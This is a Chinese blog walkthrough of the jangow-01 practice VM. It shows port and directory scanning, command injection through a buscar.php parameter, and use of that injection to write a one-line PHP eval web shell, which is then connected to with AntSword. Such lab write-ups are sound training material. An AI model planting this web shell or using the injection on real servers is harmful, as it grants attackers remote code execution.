当前位置: 首页 > article >正文

jangow-01-1.0.1靶机

靶机 ip:192.168.152.155

把靶机的网络模式调成和攻击机kali一样的网络模式,我的kali是NAT模式,

在系统启动时(长按shift键)直到显示以下界面 ,我们选第二个,按回车。

继续选择第二个,这次按 e 进入编辑页面

接下来, 删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"

按 F10 或者 ctrl+x 启动

我们 cd 到 etc 下的 network 目录中修改 interfaces 文件(将网卡信息设置为 ens33),重启靶机即可生效。)

cd etc
cd network
vim interfaces

我们使用 nmap -sS 扫描端口

发现他开启了 80 和 21 端口

我们访问一下 80 端口

发现了一个 site 目录,点击进去是一个页面

我们继续使用 dirb 查一下他有什么文件

我们挨个访问一下,assets 是一个图片目录

css 是一个文件目录

访问到 buscar.php 中发现url 框中有参数 buscar=

我们输入一个 id 参数

页面有变化

这时我们就可以写入一个一句话木马

echo '<?php eval($_POST["cmd"]);' > 123.php

我们去访问一下 123.php

访问成功,使用蚁剑连接

获得 shell


http://www.kler.cn/a/454254.html

相关文章:

  • python递归最多多少层
  • 金融租赁系统的发展与全球化战略实施探讨
  • 在Python如何用Type创建类
  • 前端:改变鼠标点击物体的颜色
  • Nmap基础入门及常用命令汇总
  • 【ES6复习笔记】集合Set(13)
  • 16.3、网络安全风险评估项目流程与工作内容
  • 骑砍2霸主MOD开发(26)-Mono脚本系统
  • 《VQ-VAE》:Stable Diffusion设计的架构源泉
  • 在 Ubuntu 服务器上添加和删除用户
  • Redis篇--应用篇4--自动提示,自动补全
  • Oracle怎么写存储过程的定时任务执行语句
  • 骁龙 8 至尊版:AI 手机的变革先锋
  • 青少年编程与数学 02-005 移动Web编程基础 02课题、视口与像素
  • QT--模型/视图
  • 如何使用 Django 框架创建简单的 Web 应用?
  • Android native+html5的混合开发
  • 我的 2024 年终总结
  • 设计模式の命令访问者迭代器模式
  • MIT实验笔记冲刺2 实验部分
  • 工作生活做事慢效率低原因及解决方案
  • C语言变量指针、指针变量、数组指针、指针数组
  • 流程图(二)利用python绘制网络图
  • shardingsphere分库分表项目实践5-自己用java写一个sql解析器+完整项目源码
  • 探秘“香水的 ChatGPT”:AI 开启嗅觉奇幻之旅!
  • 【自留】Unity VR入门